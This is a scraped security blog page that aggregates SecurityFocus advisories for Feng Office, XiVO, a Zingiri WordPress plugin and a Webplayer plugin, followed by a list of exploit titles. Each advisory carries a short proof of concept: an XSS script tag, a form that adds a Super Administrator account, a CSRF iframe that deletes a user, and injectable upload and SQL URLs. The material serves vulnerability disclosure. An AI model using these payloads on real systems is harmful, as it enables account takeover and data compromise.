source: https://www.securityfocus.com/bid/56626/info
Feng Office is prone to a security-bypass vulnerability and an HTML-injection vulnerability.
An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application.
Feng Office 2.2.1 and 2.0 Beta 3 are vulnerable; other versions may also be affected.
# Expl0it/P0c/Xss ###################
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
# Expl0it/P0c/Privilege Escalation ###################
<input type="hidden" value="" name="contact[new_contact_from_mail_div_id]">
<input type="hidden" value="" name="contact[hf_contacts]">
<label for="og_1353469580_283914profileFormFirstName">First name:
<input type="text" value="poc" name="contact[first_name]" maxlength="50" id="og_1353469580_283914profileFormFirstName">
<label for="og_1353469580_283914profileFormSurName">Last name:
<input type="text" value="poc2" name="contact[surname]" maxlength="50" id="og_1353469580_283914profileFormSurname">
<label for="og_1353469580_283914profileFormEmail">Email address:</label>
<input type="text" value="poctest@live.com" name="contact[email]" style="width:260px;" maxlength="100" id="og_1353469580_283914profileFormEmail">
<div style="" class="user-data">
<label>Password:<input type="password" name="contact[user][password]">
<label>Repeat password:<input type="password" name="contact[user][password_a]" class="field-error">
<select name="contact[user][type]">
<option value="1">Super Administrator</option>
<button tabindex="20000" id="og_1353471270_613002submit2" class="submit" type="submit" accesskey="s">Add Per<u>s</u>on</button>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158203
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/56652/info
XiVO is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
XiVO 12.22 is vulnerable; other versions may also be affected.
<html><head><body>
<title>Deleter user ID 2</title>
<iframe src=https://www.example.com/xivo/configuration/index.php/manage/user/?act=delete&id=2&page=1');
</body></head><html>
source: https://www.securityfocus.com/bid/56659/info
The Zingiri Web Shop plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Zingiri Web Shop 2.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?path=[path]
source: https://www.securityfocus.com/bid/56660/info
The Webplayer plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/webplayer/config.php?id=[SQL]

WordPress Plugin Plg Novana - 'id' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

YesWiki 0.2 - 'squelette' Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

SphereFTP Server 2.0 - Crash (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Cerb 7.0.3 - Cross-Site Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Theme Toolbox - 'mls' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Savant Web Server 3.1 - Denial of-Service (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

HooToo Tripmate HT-TM01 2.000.022 - Cross-Site Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Disconnect.me Mac OSX Client 2.0 - Local Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Elastix < 2.5 - PHP Code Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Theme CStar Design - 'id' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Mantis Bug Tracker 1.2.19 - Host Header
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

BigDump 0.29b and 0.32b - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Elastix - 'page' Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

AutoCAD DWG and DXF To PDF Converter 2.2 - Local Buffer Overflow
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

FireEye Appliance - Unauthorized File Disclosure
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view